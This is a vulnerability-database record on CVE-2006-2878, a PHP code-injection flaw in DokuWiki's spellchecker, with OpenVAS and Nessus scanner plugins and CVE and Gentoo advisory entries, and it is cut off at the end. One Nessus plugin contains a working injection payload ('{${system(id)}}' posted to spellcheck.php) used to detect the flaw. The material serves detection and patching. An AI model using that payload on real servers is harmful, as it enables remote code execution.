ID OPENVAS:56962 Type openvas Reporter Copyright (c) 2006 E-Soft Inc. http://www.securityspace.com Modified 2017-07-07T00:00:00
Description
The remote host is missing updates announced in
advisory GLSA 200606-16.
# OpenVAS Vulnerability Test
# $
# Description: Auto generated from Gentoo's XML based advisory
#
# Authors:
# Thomas Reinke <reinke@securityspace.com>
#
# Copyright:
# Copyright (c) 2008 E-Soft Inc. http://www.securityspace.com
# Text descriptions are largely excerpted from the referenced
# advisories, and are Copyright (c) the respective author(s)
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License version 2,
# as published by the Free Software Foundation
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
#
include("revisions-lib.inc");
tag_insight = "A flaw in DokuWiki's spell checker allows for the execution of arbitrary
PHP commands, even without proper authentication.";
tag_solution = "All DokuWiki users should upgrade to the latest version:
# emerge --sync
# emerge --ask --oneshot --verbose '>=www-apps/dokuwiki-20060309-r1'
http://www.securityspace.com/smysecure/catid.html?in=GLSA%20200606-16
http://bugs.gentoo.org/show_bug.cgi?id=135623
http://www.hardened-php.net/advisory_042006.119.html";
tag_summary = "The remote host is missing updates announced in
advisory GLSA 200606-16.";
if(description)
{
script_id(56962);
script_version("$Revision: 6596 $");
script_tag(name:"last_modification", value:"$Date: 2017-07-07 11:21:37 +0200 (Fri, 07 Jul 2017) $");
script_tag(name:"creation_date", value:"2008-09-24 21:14:03 +0200 (Wed, 24 Sep 2008)");
script_cve_id("CVE-2006-2878");
script_tag(name:"cvss_base", value:"7.5");
script_tag(name:"cvss_base_vector", value:"AV:N/AC:L/Au:N/C:P/I:P/A:P");
script_name("Gentoo Security Advisory GLSA 200606-16 (DokuWiki)");
script_category(ACT_GATHER_INFO);
script_copyright("Copyright (c) 2006 E-Soft Inc. http://www.securityspace.com");
script_family("Gentoo Local Security Checks");
script_dependencies("gather-package-list.nasl");
script_mandatory_keys("ssh/login/gentoo", "ssh/login/pkg");
script_tag(name : "insight" , value : tag_insight);
script_tag(name : "solution" , value : tag_solution);
script_tag(name : "summary" , value : tag_summary);
script_tag(name:"qod_type", value:"package");
script_tag(name:"solution_type", value:"VendorFix");
exit(0);
}
#
# The script code starts here
#
include("pkg-lib-gentoo.inc");
res = "";
report = "";
if ((res = ispkgvuln(pkg:"www-apps/dokuwiki", unaffected: make_list("ge 20060309-r1"), vulnerable: make_list("lt 20060309-r1"))) != NULL) {
report += res;
}
if (report != "") {
security_message(data:report);
} else if (__pkg_match) {
exit(99); # Not vulnerable.
}
{"id": "OPENVAS:56962", "type": "openvas", "bulletinFamily": "scanner", "title": "Gentoo Security Advisory GLSA 200606-16 (DokuWiki)", "description": "The remote host is missing updates announced in\nadvisory GLSA 200606-16.", "published": "2008-09-24T00:00:00", "modified": "2017-07-07T00:00:00", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "http://plugins.openvas.org/nasl.php?oid=56962", "reporter": "Copyright (c) 2006 E-Soft Inc. http://www.securityspace.com", "references": [], "cvelist": ["CVE-2006-2878"], "lastseen": "2017-07-24T12:50:00", "viewCount": 3, "enchantments": {"score": {"value": 6.8, "vector": "NONE"}, "dependencies": {"references": [{"type": "canvas", "idList": ["DOKUWIKI_EXEC"]}, {"type": "cve", "idList": ["CVE-2006-2878"]}, {"type": "debiancve", "idList": ["DEBIANCVE:CVE-2006-2878"]}, {"type": "gentoo", "idList": ["GLSA-200606-16"]}, {"type": "nessus", "idList": ["DOKUWIKI_SPELLCHECK_CMD_EXEC.NASL", "GENTOO_GLSA-200606-16.NASL"]}, {"type": "openvas", "idList": ["OPENVAS:56888"]}, {"type": "ubuntucve", "idList": ["UB:CVE-2006-2878"]}], "rev": 4}, "backreferences": {"references": [{"type": "cve", "idList": ["CVE-2006-2878"]}, {"type": "debiancve", "idList": ["DEBIANCVE:CVE-2006-2878"]}, {"type": "gentoo", "idList": ["GLSA-200606-16"]}, {"type": "nessus", "idList": ["DOKUWIKI_SPELLCHECK_CMD_EXEC.NASL"]}, {"type": "ubuntucve", "idList": ["UB:CVE-2006-2878"]}]}, "exploitation": null, "vulnersScore": 6.8}, "pluginID": "56962", "sourceData": "# OpenVAS Vulnerability Test\n# $\n# Description: Auto generated from Gentoo's XML based advisory\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2008 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisories, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"A flaw in DokuWiki's spell checker allows for the execution of arbitrary\nPHP commands, even without proper authentication.\";\ntag_solution = \"All DokuWiki users should upgrade to the latest version:\n\n # emerge --sync\n # emerge --ask --oneshot --verbose '>=www-apps/dokuwiki-20060309-r1'\n\nhttp://www.securityspace.com/smysecure/catid.html?in=GLSA%20200606-16\nhttp://bugs.gentoo.org/show_bug.cgi?id=135623\nhttp://www.hardened-php.net/advisory_042006.119.html\";\ntag_summary = \"The remote host is missing updates announced in\nadvisory GLSA 200606-16.\";\n\n \n\nif(description)\n{\n script_id(56962);\n script_version(\"$Revision: 6596 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-07 11:21:37 +0200 (Fri, 07 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2008-09-24 21:14:03 +0200 (Wed, 24 Sep 2008)\");\n script_cve_id(\"CVE-2006-2878\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_name(\"Gentoo Security Advisory GLSA 200606-16 (DokuWiki)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2006 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Gentoo Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/gentoo\", \"ssh/login/pkg\");\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-gentoo.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = ispkgvuln(pkg:\"www-apps/dokuwiki\", unaffected: make_list(\"ge 20060309-r1\"), vulnerable: make_list(\"lt 20060309-r1\"))) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "naslFamily": "Gentoo Local Security Checks", "immutableFields": [], "cvss2": {}, "cvss3": {}, "_state": {"dependencies": 1647589307, "score": 0}}
{"openvas": [{"lastseen": "2017-07-02T21:10:18", "description": "The remote host is missing an update to the system\nas announced in the referenced advisory.", "cvss3": {}, "published": "2008-09-04T00:00:00", "type": "openvas", "title": "FreeBSD Ports: dokuwiki", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2006-2878"], "modified": "2016-09-16T00:00:00", "id": "OPENVAS:56888", "href": "http://plugins.openvas.org/nasl.php?oid=56888", "sourceData": "#\n#VID af8dba15-f4cc-11da-87a1-000c6ec775d9\n# OpenVAS Vulnerability Test\n# $\n# Description: Auto generated from vuxml or freebsd advisories\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2008 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisories, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"The following package is affected: dokuwiki\";\ntag_solution = \"Update your system with the appropriate patches or\nsoftware upgrades.\n\nhttp://www.hardened-php.net/advisory_042006.119.html\nhttp://bugs.splitbrain.org/index.php?do=details&id=823\nhttp://secunia.com/advisories/20429/\nhttp://www.vuxml.org/freebsd/af8dba15-f4cc-11da-87a1-000c6ec775d9.html\";\ntag_summary = \"The remote host is missing an update to the system\nas announced in the referenced advisory.\";\n\n\nif(description)\n{\n script_id(56888);\n script_version(\"$Revision: 4078 $\");\n script_cve_id(\"CVE-2006-2878\");\n script_tag(name:\"last_modification\", value:\"$Date: 2016-09-16 07:34:17 +0200 (Fri, 16 Sep 2016) $\");\n script_tag(name:\"creation_date\", value:\"2008-09-04 20:41:11 +0200 (Thu, 04 Sep 2008)\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_name(\"FreeBSD Ports: dokuwiki\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2006 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"FreeBSD Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/freebsdrel\", \"login/SSH/success\");\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-bsd.inc\");\n\ntxt = \"\";\nvuln = 0;\nbver = portver(pkg:\"dokuwiki\");\nif(!isnull(bver) && revcomp(a:bver, b:\"20060309_1\")<0) {\n txt += 'Package dokuwiki version ' + bver + ' is installed which is known to be vulnerable.\\n';\n vuln = 1;\n}\n\nif(vuln) {\n security_message(data:string(txt));\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "nessus": [{"lastseen": "2022-04-12T15:26:45", "description": "The remote host is running DokuWiki, an open source wiki application written in PHP. \n\nThe installed version of DokuWiki fails to properly sanitize input to the 'data' parameter of the 'lib/exe/spellcheck.php' script before evaluating it to handle links embedded in the text. An unauthenticated attacker can leverage this issue with PHP commands in 'complex curly syntax' to execute arbitrary PHP code on the remote host subject to the privileges of the web server user id.", "cvss3": {"score": null, "vector": null}, "published": "2006-06-06T00:00:00", "type": "nessus", "title": "DokuWiki Spell Checker Embedded Link Arbitrary PHP Code Execution", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2006-2878"], "modified": "2022-04-11T00:00:00", "cpe": ["cpe:/a:andreas_gohr:dokuwiki"], "id": "DOKUWIKI_SPELLCHECK_CMD_EXEC.NASL", "href": "https://www.tenable.com/plugins/nessus/21662", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(21662);\n script_version(\"1.21\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/04/11\");\n\n script_cve_id(\"CVE-2006-2878\");\n script_bugtraq_id(18289);\n\n script_name(english:\"DokuWiki Spell Checker Embedded Link Arbitrary PHP Code Execution\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote web server contains a PHP application that is affected by\nan arbitrary code execution vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote host is running DokuWiki, an open source wiki application\nwritten in PHP. \n\nThe installed version of DokuWiki fails to properly sanitize input to\nthe 'data' parameter of the 'lib/exe/spellcheck.php' script before\nevaluating it to handle links embedded in the text. An\nunauthenticated attacker can leverage this issue with PHP commands in\n'complex curly syntax' to execute arbitrary PHP code on the remote\nhost subject to the privileges of the web server user id.\");\n script_set_attribute(attribute:\"see_also\", value:\"http://www.hardened-php.net/advisory_042006.119.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.securityfocus.com/archive/1/435989/30/0/threaded\");\n script_set_attribute(attribute:\"see_also\", value:\"http://bugs.splitbrain.org/index.php?do=details&id=823\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to DokuWiki release 2006-03-09 with hotfix 823 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:ND/RC:ND\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_nessus\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:\"CANVAS\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2006/06/04\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2006/06/06\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:andreas_gohr:dokuwiki\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_ATTACK);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2006-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"dokuwiki_detect.nasl\");\n script_require_keys(\"www/dokuwiki\");\n script_exclude_keys(\"Settings/disable_cgi_scanning\");\n script_require_ports(\"Services/www\", 80);\n\n exit(0);\n}\n\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"http.inc\");\ninclude(\"data_protection.inc\");\n\nport = get_http_port(default:80);\nif (!can_host_php(port:port)) exit(0);\n\n# Test an install.\ninstall = get_kb_item(string(\"www/\", port, \"/dokuwiki\"));\nif (isnull(install)) exit(0);\nmatches = eregmatch(string:install, pattern:\"^(.+) under (/.*)$\");\nif (!isnull(matches))\n{\n dir = matches[2];\n\n # Make sure the script exists.\n url = string(dir, \"/lib/exe/spellcheck.php\");\n r = http_send_recv3(method:\"GET\", item:url, port:port);\n if (isnull(r)) exit(0);\n res = r[2];\n\n # If it does...\n if (\"The called function does not exist!\" >< res)\n {\n # Try to exploit the flaw to run a command.\n cmd = \"id\";\n postdata = string(\n \"call=check&\",\n \"utf8=1&\",\n \"data=[[{${system(\", cmd, \")}}]]\"\n );\n r = http_send_recv3(method: \"POST\", item: url, version: 11,\n add_headers: make_array(\"Content-Type\", \"application/x-www-form-urlencoded\"),\n data: postdata, \n port:port);\n if (isnull(r)) exit(0);\n res = r[2];\n\n # There's a problem if...\n if (\n # the output looks like it's from id or...\n egrep(pattern:\"uid=[0-9]+.*gid=[0-9]+.*\", string:res) ||\n # PHP's disable_functions prevents running system().\n egrep(pattern:\"Warning.+\\(\\) has been disabled for security reasons\", string:res)\n )\n {\n if (egrep(pattern:\"uid=[0-9]+.*gid=[0-9]+.*\", string:res))\n {\n output = res - strstr(res, \"0[[\");\n report = string(\n \"Nessus was able to execute the command '\", cmd, \"' on the remote host,\\n\",\n \"which produced the following output :\\n\",\n \"\\n\",\n data_protection::sanitize_uid(output:output)\n );\n }\n else report = NULL;\n\n security_hole(port:port, extra: report);\n exit(0);\n }\n }\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-08-19T13:15:29", "description": "The remote host is affected by the vulnerability described in GLSA-200606-16 (DokuWiki: PHP code injection)\n\n Stefan Esser discovered that the DokuWiki spell checker fails to properly sanitize PHP's 'complex curly syntax'.\n Impact :\n\n A unauthenticated remote attacker may execute arbitrary PHP commands - and thus possibly arbitrary system commands - with the permissions of the user running the webserver that serves DokuWiki pages.\n Workaround :\n\n There is no known workaround at this time.", "cvss3": {"score": null, "vector": null}, "published": "2006-06-16T00:00:00", "type": "nessus", "title": "GLSA-200606-16 : DokuWiki: PHP code injection", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2006-2878"], "modified": "2021-01-06T00:00:00", "cpe": ["p-cpe:/a:gentoo:linux:dokuwiki", "cpe:/o:gentoo:linux"], "id": "GENTOO_GLSA-200606-16.NASL", "href": "https://www.tenable.com/plugins/nessus/21709", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Gentoo Linux Security Advisory GLSA 200606-16.\n#\n# The advisory text is Copyright (C) 2001-2015 Gentoo Foundation, Inc.\n# and licensed under the Creative Commons - Attribution / Share Alike \n# license. See http://creativecommons.org/licenses/by-sa/3.0/\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(21709);\n script_version(\"1.16\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2006-2878\");\n script_xref(name:\"GLSA\", value:\"200606-16\");\n\n script_name(english:\"GLSA-200606-16 : DokuWiki: PHP code injection\");\n script_summary(english:\"Checks for updated package(s) in /var/db/pkg\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Gentoo host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The remote host is affected by the vulnerability described in GLSA-200606-16\n(DokuWiki: PHP code injection)\n\n Stefan Esser discovered that the DokuWiki spell checker fails to\n properly sanitize PHP's 'complex curly syntax'.\n \nImpact :\n\n A unauthenticated remote attacker may execute arbitrary PHP commands -\n and thus possibly arbitrary system commands - with the permissions of\n the user running the webserver that serves DokuWiki pages.\n \nWorkaround :\n\n There is no known workaround at this time.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.hardened-php.net/advisory_042006.119.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security.gentoo.org/glsa/200606-16\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"All DokuWiki users should upgrade to the latest version:\n # emerge --sync\n # emerge --ask --oneshot --verbose '>=www-apps/dokuwiki-20060309-r1'\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:gentoo:linux:dokuwiki\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:gentoo:linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2006/06/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2006/06/16\");\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2005/11/03\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2006-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Gentoo Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Gentoo/release\", \"Host/Gentoo/qpkg-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"qpkg.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Gentoo/release\")) audit(AUDIT_OS_NOT, \"Gentoo\");\nif (!get_kb_item(\"Host/Gentoo/qpkg-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (qpkg_check(package:\"www-apps/dokuwiki\", unaffected:make_list(\"ge 20060309-r1\"), vulnerable:make_list(\"lt 20060309-r1\"))) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:qpkg_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = qpkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"DokuWiki\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "cve": [{"lastseen": "2022-03-23T15:19:00", "description": "The spellchecker (spellcheck.php) in DokuWiki 2006/06/04 and earlier allows remote attackers to insert and execute arbitrary PHP code via \"complex curly syntax\" that is inserted into a regular expression that is processed by preg_replace with the /e (executable) modifier.", "cvss3": {}, "published": "2006-06-07T00:02:00", "type": "cve", "title": "CVE-2006-2878", "cwe": ["NVD-CWE-Other"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": true, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2006-2878"], "modified": "2018-10-18T16:43:00", "cpe": ["cpe:/a:andreas_gohr:dokuwiki:release_2006-03-05", "cpe:/a:andreas_gohr:dokuwiki:release_2005-02-06", "cpe:/a:andreas_gohr:dokuwiki:release_2004-07-04", "cpe:/a:andreas_gohr:dokuwiki:release_2004-11-10", "cpe:/a:andreas_gohr:dokuwiki:release_2005-05-07", "cpe:/a:andreas_gohr:dokuwiki:release_2004-08-08", "cpe:/a:andreas_gohr:dokuwiki:release_2004-07-21", "cpe:/a:andreas_gohr:dokuwiki:release_2004-10-19", "cpe:/a:andreas_gohr:dokuwiki:release_2004-11-02", "cpe:/a:andreas_gohr:dokuwiki:release_2004-09-12", "cpe:/a:andreas_gohr:dokuwiki:release_2005-02-18", "cpe:/a:andreas_gohr:dokuwiki:release_2004-07-12", "cpe:/a:andreas_gohr:dokuwiki:release_2004-09-25", "cpe:/a:andreas_gohr:dokuwiki:release_2005-07-13", "cpe:/a:andreas_gohr:dokuwiki:release_2005-09-22", "cpe:/a:andreas_gohr:dokuwiki:release_2005-07-01", "cpe:/a:andreas_gohr:dokuwiki:release_2004-07-07", "cpe:/a:andreas_gohr:dokuwiki:release_2005-01-15", "cpe:/a:andreas_gohr:dokuwiki:release_2005-01-16a", "cpe:/a:andreas_gohr:dokuwiki:release_2005-01-14", "cpe:/a:andreas_gohr:dokuwiki:release_2006-06-04", "cpe:/a:andreas_gohr:dokuwiki:release_2004-07-25", "cpe:/a:andreas_gohr:dokuwiki:release_2004-08-22", "cpe:/a:andreas_gohr:dokuwiki:release_2004-11-01", "cpe:/a:andreas_gohr:dokuwiki:release_2004-08-15a", "cpe:/a:andreas_gohr:dokuwiki:release_2005-09-19", "cpe:/a:andreas_gohr:dokuwiki:release_2004-09-30"], "id": "CVE-2006-2878", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2006-2878", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:andreas_gohr:dokuwiki:release_2005-07-13:*:*:*:*:*:*:*", "cpe:2.3:a:andreas_gohr:dokuwiki:release_2004-07-12:*:*:*:*:*:*:*", "cpe:2.3:a:andreas_gohr:dokuwiki:release_2004-11-10:*:*:*:*:*:*:*", "cpe:2.3:a:andreas_gohr:dokuwiki:release_2004-09-12:*:*:*:*:*:*:*", "cpe:2.3:a:andreas_gohr:dokuwiki:release_2004-11-01:*:*:*:*:*:*:*", "cpe:2.3:a:andreas_gohr:dokuwiki:release_2004-09-25:*:*:*:*:*:*:*", "cpe:2.3:a:andreas_gohr:dokuwiki:release_2004-08-08:*:*:*:*:*:*:*", "cpe:2.3:a:andreas_gohr:dokuwiki:release_2004-11-02:*:*:*:*:*:*:*", "cpe:2.3:a:andreas_gohr:dokuwiki:release_2004-07-07:*:*:*:*:*:*:*", "cpe:2.3:a:andreas_gohr:dokuwiki:release_2005-07-01:*:*:*:*:*:*:*", "cpe:2.3:a:andreas_gohr:dokuwiki:release_2005-01-14:*:*:*:*:*:*:*", "cpe:2.3:a:andreas_gohr:dokuwiki:release_2004-09-30:*:*:*:*:*:*:*", "cpe:2.3:a:andreas_gohr:dokuwiki:release_2004-07-25:*:*:*:*:*:*:*", "cpe:2.3:a:andreas_gohr:dokuwiki:release_2005-01-16a:*:*:*:*:*:*:*", "cpe:2.3:a:andreas_gohr:dokuwiki:release_2005-09-19:*:*:*:*:*:*:*", "cpe:2.3:a:andreas_gohr:dokuwiki:release_2005-05-07:*:*:*:*:*:*:*", "cpe:2.3:a:andreas_gohr:dokuwiki:release_2005-02-06:*:*:*:*:*:*:*", "cpe:2.3:a:andreas_gohr:dokuwiki:release_2004-07-04:*:*:*:*:*:*:*", "cpe:2.3:a:andreas_gohr:dokuwiki:release_2005-01-15:*:*:*:*:*:*:*", "cpe:2.3:a:andreas_gohr:dokuwiki:release_2004-10-19:*:*:*:*:*:*:*", "cpe:2.3:a:andreas_gohr:dokuwiki:release_2005-02-18:*:*:*:*:*:*:*", "cpe:2.3:a:andreas_gohr:dokuwiki:release_2004-08-15a:*:*:*:*:*:*:*", "cpe:2.3:a:andreas_gohr:dokuwiki:release_2005-09-22:*:*:*:*:*:*:*", "cpe:2.3:a:andreas_gohr:dokuwiki:release_2004-08-22:*:*:*:*:*:*:*", "cpe:2.3:a:andreas_gohr:dokuwiki:release_2006-06-04:*:*:*:*:*:*:*", "cpe:2.3:a:andreas_gohr:dokuwiki:release_2006-03-05:*:*:*:*:*:*:*", "cpe:2.3:a:andreas_gohr:dokuwiki:release_2004-07-21:*:*:*:*:*:*:*"]}], "gentoo": [{"lastseen": "2022-01-17T19:17:44", "description": "### Background\n\nDokuWiki is a simple to use wiki targeted at developer teams, workgroups and small companies. \n\n### Description\n\nStefan Esser discovered that the DokuWiki spell checker fails to properly sanitize PHP's \"complex curly syntax\". \n\n### Impact\n\nA unauthenticated remote attacker may execute arbitrary PHP commands - and thus possibly arbitrary system commands - with the permissions of the user running the webserver that serves DokuWiki pages. \n\n### Workaround\n\nThere is no known workaround at this time. \n\n### Resolution\n\nAll DokuWiki users should upgrade to the latest version: \n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose \">=www-apps/dokuwiki-20060309-r1\"", "cvss3": {}, "published": "2006-06-14T00:00:00", "type": "gentoo", "title": "DokuWiki: PHP code injection", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": true, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2006-2878"], "modified": "2006-06-14T00:00:00", "id": "GLSA-200606-16", "href": "https://security.gentoo.org/glsa/200606-16", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "ubuntucve": [{"lastseen": "2021-11-22T22:03:20", "description": "The spellchecker (spellcheck.php) in DokuWiki 2006/06/04 and earlier allows\nremote attackers to insert and execute arbitrary PHP code via \"complex\ncurly syntax\" that is inserted into a regular expression that is processed\nby preg_replace with the /e (executable) modifier.", "cvss3": {}, "published": "2006-06-07T00:00:00", "type": "ubuntucve", "title": "CVE-2006-2878", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": true, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": 